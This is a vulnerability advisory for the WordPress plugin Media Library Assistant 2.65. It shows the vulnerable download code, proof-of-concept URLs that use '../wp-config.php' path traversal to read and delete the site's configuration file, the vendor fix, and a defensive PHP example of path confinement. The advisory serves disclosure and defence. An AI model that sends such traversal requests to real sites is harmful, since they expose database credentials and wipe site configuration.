Plugin Media Library Assistant 2.65 RCE – Unlink / Local File Download

Details

  • Name : Media Library Assistant
  • Version : 2.65
  • Homepage : https://pt.wordpress.org/plugins/media-library-assistant/

Type

  • Local File Download - LFD (arbitrary file read by an authenticated user)
  • Arbitrary File Deletion via unlink()
  • Remote Code Execution - RCE (as labelled in the original advisory; the code and proof of concept below demonstrate file download and file deletion, not direct code execution)

Description

  • Required user access: an authenticated administrator, editor or author account.
  • Parameters taken from the request without validation or escaping:
    • $_REQUEST['mla_download_file']
    • $_REQUEST['mla_download_type']
    • $_REQUEST['mla_download_disposition']

Code

File: wp-content/plugins/media-library-assistant/includes/class-mla-main.php Line: 756 - 779
if ( isset( $_REQUEST['mla_download_file'] ) && isset( $_REQUEST['mla_download_type'] ) ) {
    if ( ini_get( 'zlib.output_compression' ) ) {
        ini_set( 'zlib.output_compression', 'Off' );
    }

    // The file name comes straight from the request: no realpath(), no check that it
    // lies inside the uploads tree, so "../wp-config.php" or any absolute path is accepted.
    $file_name = stripslashes( $_REQUEST['mla_download_file'] );
...
    // The same unchecked path is handed to unlink(); the @ suppresses any warning,
    // so a failed or successful deletion leaves no trace in the PHP error log.
    if ( isset( $_REQUEST['mla_download_disposition'] ) && 'delete' == $_REQUEST['mla_download_disposition'] ) {
        @unlink( $file_name );
    }
...
 

Proof of Concept

1 - Log in as an administrator, editor or author.
2 - Open http://target/wp-admin/upload.php?page=mla-menu
3 - Capture the URL the plugin generates to download any image; it carries a valid mla_admin_nonce, which is reused in the requests below.

4 - Change the parameters in that URL and request it. The captured download URL looks like this:
http://target/wp-admin/upload.php?mla_admin_nonce=01dc26b197&page=mla-menu&mla_download_file=%2Fsrv%2Fwww%2Fwordpress-develop%2Fpublic_html%2Fsrc%2Fwp-content%2Fuploads%2Fstar-wars-5.jpg&mla_download_type=image/jpeg
Arbitrary file download (a relative path resolves from wp-admin/, so ../ reaches the site root):
http://target/wp-admin/upload.php?mla_admin_nonce=01dc26b197&page=mla-menu&mla_download_file=../wp-config.php&mla_download_type=application/force-download
Arbitrary file deletion (the same request with mla_download_disposition=delete added):
http://target/wp-admin/upload.php?mla_admin_nonce=01dc26b197&page=mla-menu&mla_download_file=../wp-config.php&mla_download_type=application/force-download&mla_download_disposition=delete

Results

wp-config.php is deleted; without it WordPress falls back to its initial setup screen, so the whole site is effectively reset.

Note


Solution

https://wordpress.org/plugins/media-library-assistant/#developers

Update to Media Library Assistant 2.70 or later. From the 2.70 changelog:

  • New: A new Debug logging category has been created for “where-used” reporting.
  • New: The Att. Categories and Att. Tags taxonomies can now be displayed as columns on the Media/Library list mode admin submenu.
  • Fix: File downloads originating from a Bulk Action are now restricted to the site’s uploads directory tree.
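The fix named in the 2.70 changelog is path confinement: resolve the requested name with realpath() and refuse anything that does not land inside the uploads directory. The PHP below is an added example written for this page, not Media Library Assistant's own code; the function name mla_resolve_download_path, the temporary directory layout it builds, and the assumption of a POSIX filesystem ('/' separators, symlink() available) are all constructed for the illustration. It runs stand-alone with the php CLI and shows the advisory's wp-config.php traversal, an absolute path, a sibling directory that shares the uploads prefix, and a symlink planted inside uploads all being rejected while a genuine upload is allowed.

```php
<?php
// Added example, not code from Media Library Assistant: confine a requested
// download path to the uploads directory tree before it is read or unlinked.
// Assumptions: POSIX paths ('/' separator, symlink() available); the function
// name and the temporary directory layout below are constructed for this demo.

/**
 * Return the canonical path of $requested if it names a regular file inside
 * $uploads_basedir, or null otherwise. Callers must only readfile()/unlink()
 * a non-null return value.
 */
function mla_resolve_download_path(string $requested, string $uploads_basedir): ?string
{
    // Canonicalise the base first; realpath() returns false if it does not exist.
    $base = realpath($uploads_basedir);
    if ($base === false) {
        return null;
    }

    // Undo WordPress' magic-quoting exactly as the vulnerable code does.
    $requested = stripslashes($requested);
    if ($requested === '') {
        return null;
    }

    // Relative names resolve against the uploads tree, not PHP's working directory.
    $candidate = $requested[0] === '/' ? $requested : $base . '/' . $requested;

    // realpath() collapses "../" segments and follows symlinks, so a link planted
    // inside uploads that points at wp-config.php resolves to the outside path.
    $real = realpath($candidate);
    if ($real === false || !is_file($real)) {
        return null;
    }

    // Compare with a trailing slash so ".../uploads_evil/x" is not accepted as ".../uploads".
    $prefix = rtrim($base, '/') . '/';
    if (strncmp($real, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $real;
}

// --- Demonstration on a constructed temporary layout -------------------------
//   <root>/wp-config.php                       must never be served or deleted
//   <root>/wp-content/uploads/star-wars-5.jpg  the only legitimate target
//   <root>/wp-content/uploads/link-to-config   symlink -> <root>/wp-config.php
//   <root>/wp-content/uploads_evil/secret.txt  sibling dir sharing the prefix
$root    = sys_get_temp_dir() . '/mla-demo-' . getmypid();
$uploads = "$root/wp-content/uploads";
mkdir($uploads, 0700, true);
mkdir("$root/wp-content/uploads_evil", 0700, true);
file_put_contents("$root/wp-config.php", "<?php // constructed placeholder\n");
file_put_contents("$uploads/star-wars-5.jpg", "constructed image bytes");
file_put_contents("$root/wp-content/uploads_evil/secret.txt", "constructed");
symlink("$root/wp-config.php", "$uploads/link-to-config");

$requests = [
    'star-wars-5.jpg',             // legitimate relative name
    "$uploads/star-wars-5.jpg",    // legitimate absolute name, as in the plugin's own URLs
    '../../wp-config.php',         // the advisory's payload, rewritten relative to uploads
    "$root/wp-config.php",         // absolute path outside the tree
    '/etc/passwd',                 // absolute system file
    '../uploads_evil/secret.txt',  // sibling directory that shares the string prefix
    'link-to-config',              // symlink inside uploads pointing outside it
];
foreach ($requests as $r) {
    $resolved = mla_resolve_download_path($r, $uploads);
    printf("%-45s => %s\n", $r, $resolved === null ? 'REJECTED' : "allowed: $resolved");
}

// Remove the constructed layout again.
foreach (["$uploads/link-to-config", "$uploads/star-wars-5.jpg",
          "$root/wp-content/uploads_evil/secret.txt", "$root/wp-config.php"] as $f) {
    unlink($f);
}
foreach (["$root/wp-content/uploads_evil", $uploads, "$root/wp-content", $root] as $d) {
    rmdir($d);
}
```

Run it with php on the command line; only the two star-wars-5.jpg requests resolve, every other line prints REJECTED. In the plugin the resolved path would replace $file_name before both the download and the unlink branch, since the delete branch must go through exactly the same check; the role and nonce requirements noted above stay as they are, because administrators, editors and authors are legitimately allowed to fetch and remove their own uploads, and confinement to the uploads tree is what turns that into a safe operation.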

Timeline

  • Date Discovery : 12/29/2017
  • Date Vendor Contact : 01/03/2018
  • Date Publish : 01/04/2018
  • Date Resolution : 01/04/2018
